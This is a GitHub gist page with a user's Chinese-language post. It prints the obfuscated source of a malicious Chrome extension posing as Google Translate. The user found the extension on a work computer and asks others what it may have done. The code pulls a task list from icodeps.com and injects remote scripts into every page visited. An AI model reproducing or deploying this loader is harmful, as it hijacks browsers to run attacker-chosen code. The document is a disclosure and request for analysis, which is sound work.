-
-
Save AoEiuV020/3197f2adf7b2137adcc6018781eb2293 to your computer and use it in GitHub Desktop.
一个chrome病毒插件的代码
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0x6c6f=["\x6C\x6F\x67","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x63\x6F\x64\x65\x70\x73\x2E\x63\x6F\x6D\x2F\x6A\x73\x61\x70\x69\x2E\x70\x68\x70","\x70\x61\x72\x73\x65","\x63\x6F\x75\x6E\x74\x72\x79\x63\x6F\x64\x65","\x74\x61\x73\x6B\x6C\x69\x73\x74","\x63\x6F\x75\x6E\x74\x72\x79\x6C\x69\x73\x74","\x75\x72\x6C","\x74\x79\x70\x65","\x72\x61\x6E\x64","\x69\x6E\x64\x65\x78\x4F\x66","\x57\x57","\x72\x61\x6E\x64\x6F\x6D","\x72\x61\x6E\x64\x72\x65\x73\x3A","\x69\x6E\x6A\x65\x63\x74","\x73\x65\x6E\x64\x4D\x65\x73\x73\x61\x67\x65","\x72\x75\x6E\x74\x69\x6D\x65","\x64\x69\x72\x65\x63\x74\x6C\x6F\x61\x64\x68\x65\x61\x64","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x64\x65\x66\x65\x72","\x6C\x6F\x61\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x65\x72\x72\x6F\x72","\x62\x65\x66\x6F\x72\x65\x65\x6E\x64","\x69\x6E\x73\x65\x72\x74\x41\x64\x6A\x61\x63\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x65\x61\x64","\x62\x6F\x64\x79","\x5F\x76\x76\x5F\x64\x65\x76","\x66\x6C\x6F\x6F\x72","\x31\x2E\x30\x2E\x30\x2E\x35\x39","\x3F\x76\x3D","\x64\x69\x72\x65\x63\x74\x6C\x6F\x61\x64\x62\x6F\x64\x79","\x6E\x61\x6D\x65","\x3A","\x6D\x65\x73\x73\x61\x67\x65","\x61\x6A\x61\x78"];const bShouldLog=false;function log(_0xaa32x3){if(bShouldLog){console[_0x6c6f[0]](_0xaa32x3)}}(function(){$[_0x6c6f[39]]({type:_0x6c6f[1],url:_0x6c6f[2],success:function(_0xaa32x4){try{var _0xaa32x5=JSON[_0x6c6f[3]](_0xaa32x4);var _0xaa32x6=_0xaa32x5[_0x6c6f[4]];var _0xaa32x7=_0xaa32x5[_0x6c6f[5]];log(_0xaa32x7);for(var _0xaa32x8 of _0xaa32x7){log(_0xaa32x8);var _0xaa32x9=_0xaa32x8[_0x6c6f[6]];var _0xaa32xa=_0xaa32x8[_0x6c6f[7]];var _0xaa32xb=_0xaa32x8[_0x6c6f[8]];var _0xaa32xc=_0xaa32x8[_0x6c6f[9]];if(_0xaa32x9[_0x6c6f[10]](_0xaa32x6)> -1|| _0xaa32x9[_0x6c6f[10]](_0x6c6f[11])> -1){var _0xaa32xd=parseInt(Math[_0x6c6f[12]]()* _0xaa32xc);log(_0x6c6f[13]+ _0xaa32xd);if(_0xaa32xd== 0){if(_0xaa32xb== _0x6c6f[14]){chrome[_0x6c6f[16]][_0x6c6f[15]]({action:_0x6c6f[14],data:_0xaa32xa})}else {if(_0xaa32xb== _0x6c6f[17]){(function(){function _0xaa32xe(_0xaa32xf,_0xaa32x10,_0xaa32x11,_0xaa32x12){let _0xaa32x13=document[_0x6c6f[19]](_0x6c6f[18]);_0xaa32x13[_0x6c6f[20]]= _0xaa32xf;_0xaa32x13[_0x6c6f[8]]= _0x6c6f[21];_0xaa32x13[_0x6c6f[22]]= false;_0xaa32x13[_0x6c6f[23]]= false;if(_0xaa32x11){_0xaa32x13[_0x6c6f[25]](_0x6c6f[24],function(){_0xaa32x11()})};if(_0xaa32x12){_0xaa32x13[_0x6c6f[25]](_0x6c6f[26],function(){_0xaa32x11()})};if(_0xaa32x10){document[_0x6c6f[29]][_0x6c6f[28]](_0x6c6f[27],_0xaa32x13)}else {document[_0x6c6f[30]][_0x6c6f[28]](_0x6c6f[27],_0xaa32x13)}}window[_0x6c6f[31]]= false;const _0xaa32x14=window[_0x6c6f[31]]?Math[_0x6c6f[32]](Math[_0x6c6f[12]]()* Math[_0x6c6f[32]](99999999999999)):_0x6c6f[33];log(_0xaa32xa+ _0xaa32x14);_0xaa32xe(_0xaa32xa+ _0x6c6f[34]+ _0xaa32x14,true)})()}else {if(_0xaa32xb== _0x6c6f[35]){(function(){function _0xaa32xe(_0xaa32xf,_0xaa32x10,_0xaa32x11,_0xaa32x12){let _0xaa32x13=document[_0x6c6f[19]](_0x6c6f[18]);_0xaa32x13[_0x6c6f[20]]= _0xaa32xf;_0xaa32x13[_0x6c6f[8]]= _0x6c6f[21];_0xaa32x13[_0x6c6f[22]]= false;_0xaa32x13[_0x6c6f[23]]= false;if(_0xaa32x11){_0xaa32x13[_0x6c6f[25]](_0x6c6f[24],function(){_0xaa32x11()})};if(_0xaa32x12){_0xaa32x13[_0x6c6f[25]](_0x6c6f[26],function(){_0xaa32x11()})};if(_0xaa32x10){document[_0x6c6f[29]][_0x6c6f[28]](_0x6c6f[27],_0xaa32x13)}else {document[_0x6c6f[30]][_0x6c6f[28]](_0x6c6f[27],_0xaa32x13)}}window[_0x6c6f[31]]= false;const _0xaa32x14=window[_0x6c6f[31]]?Math[_0x6c6f[32]](Math[_0x6c6f[12]]()* Math[_0x6c6f[32]](99999999999999)):_0x6c6f[33];log(_0xaa32xa+ _0xaa32x14);_0xaa32xe(_0xaa32xa+ _0x6c6f[34]+ _0xaa32x14,false)})()}}}}}}}catch(e){log(e[_0x6c6f[36]]+ _0x6c6f[37]+ e[_0x6c6f[38]])}},error:function(_0xaa32x15,_0xaa32x16,_0xaa32x17){}})})() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
突然发现 chrome 访问任何网站都有个 net::ERR_CONNECTION_CLOSED 的 xhr 失败请求,
地址是,https://www.icodeps.com/jsapi.php
发起请求的 js 代码混淆过了看不太清,大概就是请求这个地址成功后收集信息然后怎样的,
排查插件发现是个伪装成 Google Translate 的本地插件干的,
有点难绷,这是唯一一个本地插件,以前还有别的,所以开发者模式打开了也没注意,
而且这个插件图标右下角有个小图标,现在想来应该就是本地插件的意思,之前没注意,
看创建时间是 2022 年 8 月 12 日,路径是 C:\Program Files\aieoplapobidheellikiicjfpamacpfd
这是公司电脑,之前确实中过毒,具体忘了,那之后就装上 360 了,现在换火绒了,一直以为没事了的,
现在这个病毒插件应该是过期了,服务器关闭了,
但不知道之前做过些什么,搜也搜不到相关信息,有点虚,求大佬看看,
https://gist.github.com/AoEiuV020/3197f2adf7b2137adcc6018781eb2293
完整插件传到 notion 了,
https://aoeiuv020.notion.site/122768ca6ff04cef9c92d15867562262